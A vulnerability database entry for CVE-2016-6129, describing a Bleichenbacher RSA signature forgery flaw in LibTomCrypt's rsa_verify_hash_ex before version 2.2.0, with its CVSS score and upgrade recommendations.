PT-2017-8916 · Libtom+2 · Libtomcrypt+2
Sjaeckel
·
Published
2016-11-06
·
Updated
2026-06-05
·
CVE-2016-6129
CVSS v3.1
7.5
High
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N |
Name of the Vulnerable Software and Affected Versions
LibTomCrypt versions prior to 2.2.0
OP-TEE versions prior to 2.2.0
Description
The issue arises from the rsa verify hash ex function in rsa verify hash.c, which fails to validate that the message length matches the ASN.1 encoded data length. This oversight enables remote attackers to forge RSA signatures or public certificates by exploiting a Bleichenbacher signature forgery attack.
Recommendations
For LibTomCrypt versions prior to 2.2.0, update to version 2.2.0 or later to resolve the issue.
For OP-TEE versions prior to 2.2.0, update to version 2.2.0 or later to resolve the issue.
As a temporary workaround, consider restricting the use of the rsa verify hash ex function until a patch is available.
Fix
RCE
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Alt Linux
Libtomcrypt
Op-Tee